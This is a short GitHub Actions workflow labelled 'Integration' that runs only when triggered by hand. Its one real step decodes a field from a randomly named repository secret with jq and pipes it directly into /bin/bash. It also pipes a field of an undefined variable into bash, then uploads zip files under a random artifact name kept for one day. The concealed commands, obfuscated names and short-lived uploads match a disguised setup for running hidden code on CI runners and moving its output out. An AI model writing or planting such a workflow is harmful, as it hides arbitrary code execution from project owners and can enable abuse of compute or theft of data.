name: Integration
on:
  workflow_dispatch:

jobs:
  action:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Begin
        env:
          ueq93: ${{ secrets.ueq93 }}
        run: |
          printf '%s' "$ueq93" | jq -r .gkoay02 | /bin/bash
          echo $voufi406 | jq -r .fdrzb91168 | /bin/bash

      - name: Save results
        uses: actions/upload-artifact@v4
        with:
          name: JyhzuKfQ
          path: "*.zip"
          retention-days: 1
